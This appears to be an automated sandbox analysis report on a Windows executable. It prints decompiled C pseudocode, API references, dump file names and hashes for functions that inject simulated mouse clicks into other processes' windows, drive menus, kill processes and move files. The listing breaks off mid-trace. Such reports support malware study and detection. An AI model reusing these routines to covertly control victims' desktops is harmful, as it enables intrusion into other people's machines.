0x0041aced
0x0041acf5
0x0041acfb
0x0041acfb
0x0041acff
0x0041ad00
0x0041ace2
0x0041ad06
0x0041ad0b
0x0041ad21
0x0041ad26
0x0041ad35
0x0041ad3d
0x0041ad3f
0x0041ad3f
0x0041ad4f
0x0041ad59
0x0041ad6f
0x0041adbe
0x0041adc6
0x0041adcf
0x00000000
0x00000000
0x0041adc0
0x0041adc0
0x0041add1
0x0041addf
0x0041addf
0x0041ad71
0x0041ad79
0x0041ad7d
0x0041adae
0x0041adae
0x0041ad7d
0x0041ad6f
0x0041ad59
0x0041ad26
0x0041acc1
0x0041aca5
0x0041ae2a
0x0041ae38

APIs

GetMenu.USER32(?), ref: 0041ACB7
GetMenuItemCount.USER32 ref: 0041ACCD
GetMenuState.USER32 ref: 0041ACE5
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0041ACF5
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0041AD1B
GetMenuState.USER32 ref: 0041AD2F
EndMenu.USER32 ref: 0041AD3F
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0041AD4F
GetSubMenu.USER32 ref: 0041AD73
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0041AD8D
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041ADAE
SendMessageW.USER32(?,00000111,?,00000000), ref: 0041ADDF
SetKeyboardState.USER32 ref: 0041AE1E
SetEvent.KERNEL32 ref: 0041AE2A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 0b9e565d704197867e07e76a02212cfc6048368f63c1b9b3694d9a2df468041c
Instruction ID: a0e7fb7c48291ef0dbad541822e4ca7d423d2952a92883a3a883671260c97e52
Opcode Fuzzy Hash: 0b9e565d704197867e07e76a02212cfc6048368f63c1b9b3694d9a2df468041c
Instruction Fuzzy Hash: 2C31C131101305AFD7215F64DD88AEB7FF8EB45765F00422AF964A11B1C7348DA5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9C1, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A9C1(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E004133D0( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0041a9c9
0x0041a9cb
0x0041a9d1
0x0041a9d4
0x0041a9d4
0x0041a9d6
0x0041a9e1
0x0041a9e4
0x0041a9e4
0x0041a9e6
0x0041a9ec
0x0041a9ef
0x0041a9ef
0x0041a9f5
0x0041a9fa
0x0041a9fd
0x0041a9fd
0x0041a9ff
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0d
0x0041aa11
0x0041aa14
0x0041aa14
0x0041aa1b
0x0041aa1d
0x0041aa25
0x0041aa2e
0x0041aa2e
0x0041aa34
0x0041aa3c
0x0041aa3f
0x0041aa3f
0x0041aa41
0x0041aa49
0x0041aa4c
0x0041aa4c
0x0041aa52
0x0041aa5a
0x0041aa5d
0x0041aa5d
0x0041aa5f
0x0041aa67
0x0041aa85
0x0041aa85
0x0041aa91
0x0041aa91
0x0041aa99

APIs

DeleteObject.GDI32(?), ref: 0041A9D4
CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9E4
TlsFree.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9EF
CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9FD
UnmapViewOfFile.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA07
CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA14
SelectObject.GDI32(?,?), ref: 0041AA2E
DeleteObject.GDI32(?), ref: 0041AA3F
DeleteDC.GDI32(?), ref: 0041AA4C
CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA5D
WaitForSingleObject.KERNEL32(?,00000000,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA6C
PostThreadMessageW.USER32 ref: 0041AA85

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: 04f97648425f402a3d8a3a65ee34058552988615054ced53ea4d21971d3d7671
Instruction ID: 84cc935ca9ff9b43167a6365ca12082fbb38715edf6fc36869ca495fc9edda93
Opcode Fuzzy Hash: 04f97648425f402a3d8a3a65ee34058552988615054ced53ea4d21971d3d7671
Instruction Fuzzy Hash: 24210970701701ABD7209B799E48B97B3ECAF44781F04492AB955E36A0DB38E890CA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C445, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C445(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E0041A6EF(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t86 =  &_v140;
					E0041601A( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
					_v5 = E004151A4( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E0040C2E3(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E004119FD( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						TerminateProcess( *(_t85 + 0x17c), 0);
						E004133D0(_t85 + 0x17c);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x0040c445
0x0040c445
0x0040c453
0x0040c45a
0x0040c45d
0x0040c462
0x0040c5ae
0x00000000
0x0040c5ae
0x0040c477
0x0040c4a5
0x0040c479
0x0040c489
0x0040c48f
0x0040c4a0
0x0040c4a0
0x0040c4b3
0x0040c4fe
0x0040c505
0x0040c56d
0x0040c56d
0x0040c577
0x0040c582
0x0040c594
0x0040c5a8
0x0040c5a8
0x00000000
0x0040c577
0x0040c513
0x0040c51b
0x0040c533
0x00000000
0x00000000
0x0040c545
0x0040c562
0x0040c568
0x00000000
0x0040c568
0x0040c551
0x00000000
0x00000000
0x00000000
0x0040c4bb
0x0040c4be
0x0040c4cd
0x0040c4e9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4e9

APIs

Part of subcall function 0041A6EF: GetClassNameW.USER32 ref: 0041A70A

GetWindowThreadProcessId.USER32(?,?), ref: 0040C46F
ResetEvent.KERNEL32(00000010), ref: 0040C4BE
PostMessageW.USER32(?,?,?,00000010), ref: 0040C4E1
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 0040C4F0
ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040C51B
PostThreadMessageW.USER32 ref: 0040C52B
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040C53D

Part of subcall function 0041601A: StringFromGUID2.OLE32(00000000,?,00000028,00406347,?,00000010,00000000,77A19EB0), ref: 004160BB

Part of subcall function 004151A4: OpenMutexW.KERNEL32(00100000,00000000,00000000,00406CC8,?,19367401,?,00000001,8889347B,00000002), ref: 004151AF
Part of subcall function 004151A4: CloseHandle.KERNEL32(00000000), ref: 004151BA

TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 0040C562

Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133DF
Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133E8

IntersectRect.USER32 ref: 0040C582
FillRect.USER32 ref: 0040C594
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040C5A8

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 80f214f17c96279082b7044dfe39ae44752b8f98dafe1ada3c3de525ae8936bc
Instruction ID: e400f066a3bc26016dbcda979542cf9c5c09c6bd8c548c9ac4e964899fa1dc48
Opcode Fuzzy Hash: 80f214f17c96279082b7044dfe39ae44752b8f98dafe1ada3c3de525ae8936bc
Instruction Fuzzy Hash: 24419E30500219FBEF119FA0CD85BEA7BB8AF04704F048176F944EA1A1DB79D955DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040874C, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040874C(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0041AA9C(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E004082BE(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E0040824F(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0041AA9C(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E004160F6(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E0040824F(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E0041A6EF(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E0040824F(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E0041A6EF(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E004084BE(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E004084BE(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0041AA9C(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E004084BE(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E004084BE(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0041AA9C(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0041AA9C(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x00408754
0x00408756
0x0040875c
0x00408766
0x00408792
0x00408798
0x0040879d
0x004087b1
0x0040879f
0x0040879f
0x0040879f
0x00408768
0x0040876c
0x00408776
0x0040877b
0x0040877b
0x00408783
0x0040878b
0x0040878b
0x00408783
0x004087ba
0x004087bd
0x004087c3
0x004087c9
0x004087d1
0x00408a55
0x00408a59
0x00408a59
0x004087d7
0x004087da
0x004087da
0x004087de
0x004087e7
0x00000000
0x004087e9
0x004087e9
0x00000000
0x004087e9
0x004087e0
0x004087e0
0x004087ea
0x004087ee
0x004087f3
0x004087f3
0x004087f6
0x004087f6
0x004087fa
0x00408803
0x0040880f
0x0040880f
0x00408812
0x00408812
0x00408816
0x0040881f
0x0040882b
0x0040882b
0x0040882e
0x00408837
0x0040883f
0x00408845
0x0040884a
0x0040884d
0x00408853
0x00408858
0x00408863
0x0040887a
0x00408882
0x00408884
0x00408887
0x00408887
0x00408882
0x00408863
0x0040888b
0x004088ba
0x004088ba
0x004088bf
0x004088c2
0x004088ca
0x004088ef
0x004088f9
0x004088f9
0x004088da
0x004088da
0x004088dd
0x004088e4
0x004088e4
0x004088ca
0x00000000
0x0040888d
0x0040888e
0x00408895
0x00000000
0x00000000
0x0040889a
0x004088ac
0x004088ac
0x004088b1
0x004088fe
0x00408900
0x00000000
0x00000000
0x0040890b
0x00408912
0x0040891a
0x00000000
0x00000000
0x00408924
0x0040892b
0x00408931
0x0040895a
0x00408933
0x00408934
0x0040893b
0x00408953
0x00408956
0x0040893d
0x0040893d
0x0040893d
0x0040893b
0x00408961
0x00408975
0x00000000
0x00000000
0x00408977
0x00408978
0x00408979
0x0040897e
0x00000000
0x00408963
0x00408963
0x00408964
0x00408965
0x0040896a
0x00408983
0x00408983
0x00408989
0x0040898a
0x0040898f
0x00408994
0x00408998
0x004089ac
0x004089cb
0x004089cf
0x004089e3
0x00408a02
0x00408a06
0x00408a20
0x00408a20
0x00408a2c
0x00408a4f
0x00408a4f
0x00000000
0x00408a2c
0x004089e5
0x004089e6
0x004089e7
0x004089ec
0x004089f1
0x004089f1
0x004089f7
0x004089f8
0x004089fd
0x00000000
0x004089fd
0x004089d1
0x004089d2
0x004089d3
0x004089d8
0x00000000
0x004089d8
0x004089ae
0x004089af
0x004089b0
0x004089b5
0x004089ba
0x004089ba
0x004089c0
0x004089c1
0x004089c6
0x00000000
0x004089c6
0x0040899a
0x0040899b
0x0040899c
0x004089a1
0x00000000
0x004089a1
0x00408961
0x0040888b
0x00408821
0x00408822
0x00408826
0x00000000
0x00408826
0x00408818
0x00000000
0x00408818
0x00408805
0x00408806
0x0040880a
0x00000000
0x0040880a
0x004087fc
0x00000000
0x004087fc

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00408858
GetParent.USER32(00000000), ref: 0040887A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040889F
IsWindow.USER32(?), ref: 004088C2

Part of subcall function 004082BE: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004082D2
Part of subcall function 004082BE: ReleaseMutex.KERNEL32(?), ref: 004082F1
Part of subcall function 004082BE: GetWindowRect.USER32 ref: 004082FE
Part of subcall function 004082BE: IsRectEmpty.USER32(?), ref: 00408382
Part of subcall function 004082BE: GetWindowLongW.USER32(?,000000F0), ref: 00408391
Part of subcall function 004082BE: GetParent.USER32(?), ref: 004083A7
Part of subcall function 004082BE: MapWindowPoints.USER32 ref: 004083B0
Part of subcall function 004082BE: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 004083D4

GetWindowInfo.USER32 ref: 00408912
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00408A4F

Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA

Strings

, xrefs: 004087F6
<, xrefs: 0040890B
@, xrefs: 004089A8

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: 0d7f2221200d5aa56f64da65c4c9b4289fcba6bb0e3daf6430743b1c7ae4a4f4
Instruction ID: 6e072116e04ae3ac8edeaf957ab24f678ffcc714c1e7b99c093d121092c89006
Opcode Fuzzy Hash: 0d7f2221200d5aa56f64da65c4c9b4289fcba6bb0e3daf6430743b1c7ae4a4f4
Instruction Fuzzy Hash: 8991A271600309AADB11AF55CE85BFF7BB5AB80744F14803EF9807A2D1CBBC8981DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040B3B9(WCHAR* __ecx, signed char* _a4) {
				char _v514;
				signed short _v836;
				signed short _v928;
				char _v964;
				char _v1228;
				short _v1748;
				short _v1752;
				intOrPtr _v1756;
				signed char* _v1760;
				signed int _v1764;
				char* _v1768;
				void* _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				char _v1784;
				intOrPtr _v1788;
				signed int _v1792;
				signed int _v1796;
				void* _v1797;
				signed int _v1800;
				void* __ebx;
				void* __esi;
				signed int _t60;
				void* _t61;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0040634D(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1796 = _t60;
				if(_t60 != 0) {
					_t61 =  *0x4229f4; // 0x0
					_v1772 = _t61;
					_v1768 =  &_v1228;
					_v1780 = E0040B215;
					_v1776 = E0040B351;
					_v1760 = _t131;
					E004065EC( &_v964);
					E004119FD( &_v1228,  &_v514, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v928 >> 0x10;
						__eflags = _t71;
						_v1796 = _t71;
						_t72 = _v928 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1796 = _v836 >> 0x10;
							_t72 = _v836 & 0x0000ffff;
							L7:
							_v1792 = _t72;
						}
					}
					_v1796 = _v1796 * 0xea60;
					_v1792 = _v1792 * 0xea60;
					E00411A74( &_v964,  &_v964, 0, 0x3c0);
					_v1760 = 0;
					_t80 = E00406473();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1797 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E004056FB();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1796 = E0041752D(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E004119C1(_t138);
									__eflags = _v1800;
									if(_v1800 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1764 = _v1764 & 0;
										_t108 = E0040AFD9(_t128, _t129,  &_v1764, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1797;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E0040B7D6( &_v1784);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0041795A( &(_t131[8]));
											E004119C1(_v1764);
										}
									}
									E004119C1(_v1784);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1796;
										}
									} else {
										_t84 = _v1792;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E0040AE98( !( ~(_v1748 & 0x0000ffff)) &  &_v1748, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1752);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x422a70);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x422a70;
										goto L14;
									}
								} else {
									_t128 =  &_v1748;
									L14:
									_t129 = _t123;
									E00411D62(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E00416D1C(_t123);
										goto L29;
									} else {
										_v1760 = E00416CF5(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1760 - 0xffffffff;
										if(_v1760 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													__eflags = lstrcmpiW(_t123,  &_v1748);
													if(__eflags == 0) {
														goto L24;
													} else {
														_t141 = E0040634D(_t128, __eflags, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1748, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E00415194(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1752;
																_t129 = _t123;
																E00411D62(_t101 | 0xffffffff,  &_v1752, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1756 - 0xffffffff;
													if(_v1756 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x4229f4, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E00415194(_v1788);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E004119C1(_t131);
				return _t136;
			}

0x0040b3b9
0x0040b3c8
0x0040b3dc
0x0040b3e1
0x0040b3e7
0x0040b3fd
0x0040b402
0x0040b40d
0x0040b418
0x0040b420
0x0040b428
0x0040b42c
0x0040b446
0x0040b44e
0x0040b44e
0x0040b450
0x0040b474
0x0040b474
0x0040b477
0x0040b47b
0x00000000
0x0040b452
0x0040b452
0x0040b453
0x0040b45f
0x0040b463
0x0040b483
0x0040b483
0x0040b483
0x0040b453
0x0040b491
0x0040b4a4
0x0040b4b1
0x0040b4b8
0x0040b4bd
0x0040b4c2
0x0040b4c4
0x0040b4ca
0x0040b4ca
0x0040b4cd
0x0040b4d2
0x0040b5d2
0x0040b5d2
0x0040b5d7
0x0040b5d9
0x0040b5db
0x00000000
0x0040b5dd
